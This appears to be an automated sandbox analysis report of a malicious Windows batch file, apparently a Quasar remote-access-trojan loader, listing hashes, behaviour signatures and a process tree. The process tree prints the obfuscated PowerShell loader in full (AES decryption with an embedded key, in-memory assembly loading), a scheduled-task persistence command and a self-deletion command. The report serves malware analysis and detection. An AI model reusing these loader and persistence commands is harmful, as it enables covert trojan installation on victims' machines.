Analysis
-
max time kernel
63s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
31-03-2023 16:01
General
-
Target
$RECYCLE.BIN/$RJXIQS1.bat
-
Size
325KB
-
MD5
09329152d36bbe721ce3504787436cf2
-
SHA1
713a6fb0da4a111649bc7268f193ba52463e3576
-
SHA256
67e3ece7d1bf12285f01930d6eb28b91ba4a02551d24648ddc79a17cbb9d9423
-
SHA512
ee5ad3c41a7822bcc759fa3a33dd2d404cf57f1b074973a61f59c2163bb4062c908b820eb9a0e7fde009be42e6cdcab85ea5373805bbc242ea47957c9fd44a7e
-
SSDEEP
6144:uhhAqNRvU+SV6ukYulDTHKqFSC6M+cnyJZAneGwJZfNiINj:uhhAANCkJlqqFSC6dcyQo15j
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe"$RJXIQS1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $Mulkj = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat').Split([Environment]::NewLine);foreach ($IRhUZ in $Mulkj) { if ($IRhUZ.StartsWith(':: ')) { $DfRfS = $IRhUZ.Substring(3); break; }; };$tUDnz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DfRfS);$mhFKv = New-Object System.Security.Cryptography.AesManaged;$mhFKv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$mhFKv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$mhFKv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sLPwO8+S6swu7bBaCR3UKxvgiQCK9eRNWGiIj+Y64B4=');$mhFKv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wgIbPD7/o3xb1XnxDadMKQ==');$lUXqc = $mhFKv.CreateDecryptor();$tUDnz = $lUXqc.TransformFinalBlock($tUDnz, 0, $tUDnz.Length);$lUXqc.Dispose();$mhFKv.Dispose();$Trzho = New-Object System.IO.MemoryStream(, $tUDnz);$SevxL = New-Object System.IO.MemoryStream;$lSUMa = New-Object System.IO.Compression.GZipStream($Trzho, [IO.Compression.CompressionMode]::Decompress);$lSUMa.CopyTo($SevxL);$lSUMa.Dispose();$Trzho.Dispose();$SevxL.Dispose();$tUDnz = $SevxL.ToArray();$LtGjo = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($tUDnz);$tvDtB = $LtGjo.EntryPoint;$tvDtB.Invoke($null, (, [string[]] ('')))2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\SubDir\sound.exe"C:\Users\Admin\AppData\Roaming\SubDir\sound.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /c y /n /d y /t 14⤵
-
-
C:\Windows\system32\attrib.exeattrib -h -s "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RJXIQS1.bat.exe"4⤵
- Views/modifies file attributes
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
272KB
-
Filesize
472KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB